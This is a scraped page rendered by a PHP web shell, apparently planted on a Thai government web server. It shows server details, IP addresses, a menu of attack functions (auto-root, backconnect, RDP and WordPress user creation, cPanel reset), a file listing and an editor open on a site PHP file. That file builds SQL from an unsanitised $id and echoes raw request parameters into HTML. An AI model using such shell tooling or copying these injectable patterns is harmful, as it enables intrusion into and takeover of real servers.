Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
idocument /
[ HOME SHELL ]
Name
Size
Permission
Action
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
main
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
upload_files
[ DIR ]
drwxr-xr-x
add.php
16.08
KB
-rw-r--r--
book_pass.php
17.14
KB
-rw-r--r--
book_pass_form_comment1.php
5.19
KB
-rw-r--r--
book_pass_form_comment2.php
6.49
KB
-rw-r--r--
book_pass_form_comment3.php
2.72
KB
-rw-r--r--
css.css
1.06
KB
-rw-r--r--
default.php
216
B
-rw-r--r--
detail.php
8.11
KB
-rw-r--r--
display.php
9.25
KB
-rw-r--r--
docprint.php
7.22
KB
-rw-r--r--
document-detail.php
8.57
KB
-rw-r--r--
edit.php
20
KB
-rw-r--r--
idocument.sql
6.22
KB
-rw-r--r--
index.php
7.5
KB
-rw-r--r--
menu.php
3.13
KB
-rw-r--r--
menu_mobile.php
898
B
-rw-r--r--
save.php
4.91
KB
-rw-r--r--
time_inc.php
6.03
KB
-rw-r--r--
view.php
9.12
KB
-rw-r--r--
viewlist.php
7.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : book_pass_form_comment3.php
<?php defined('_VALID_') or die('Direct Access to this location is not allowed.'); ?> <div class="panel panel-default"> <div class="panel-heading"> <h4 class="panel-title"><span class='glyphicon glyphicon-list-alt' aria-hidden='true'> </span> บันทึกความเห็น</h4> </div> <div class="panel-body"> <form data-toggle="validator" role="form" enctype="multipart/form-data" class="form-horizontal" method="POST" action="?option=<?php echo $_REQUEST['option']; ?>&task=book_pass&action=comment&id=<?php echo $_REQUEST['id']; ?>"> <input type="hidden" name="commentLevel" value="3"> <input type="hidden" name="document_from" value="<?php echo $_SESSION['login_user_id']; ?>"> <?php $sqlComment = "Select * From idocument_comment where document_id = $id AND person_comments_id = '" . $_SESSION['login_user_id'] . "'"; $dbqueryComment = mysqli_query($connect, $sqlComment); if (mysqli_num_rows($dbqueryComment) > 0) { $commentData = mysqli_fetch_array($dbqueryComment); $data_comment = explode(", ", $commentData['comments_select']); }else{unset($data_comment);} if($_SESSION['position_code'] > 2){ $sql_idocument_status = "SELECT * FROM `idocument_status` WHERE position_use = 0"; }else{ $sql_idocument_status = "SELECT * FROM `idocument_status` WHERE position_use = 1"; } $query_idocument_status = mysqli_query($connect, $sql_idocument_status); while ($data_idocument_status = mysqli_fetch_assoc($query_idocument_status)) { $chkBox = ""; if (isset($commentData)) { foreach ($data_comment as $value) { if ($data_idocument_status['bookstatusid'] == $value) { $chkBox = " checked "; } } } ?> <input type="checkbox" name="comment1[]" id = "chk[<?php echo $data_idocument_status['bookstatusid']; ?>]" value="<?php echo $data_idocument_status['bookstatusid']; ?>" <?=$chkBox;?>> <label class = "text-danger" for="chk[<?php echo $data_idocument_status['bookstatusid']; ?>]"><?php echo $data_idocument_status['bookstatusname']; ?></label><br /> <?php } ?> <label class="control-label" for="commentETCtxt"> ความเห็นเพิ่มเติม </label><br><br> <textarea rows="3" cols="" name="comment1[]" id="commentETCtxt" placeholder="บันทึกความเห็นเพิ่มเติม" class="form-control"><?=(isset($data_comment)) ? $data_comment[count($data_comment) - 1] : "";?></textarea> <br> <button type="submit" class="btn btn-default pull-right" ><span class="glyphicon glyphicon-ok"></span> บันทึก </button> </div> </div> </form> </div> </div>
Close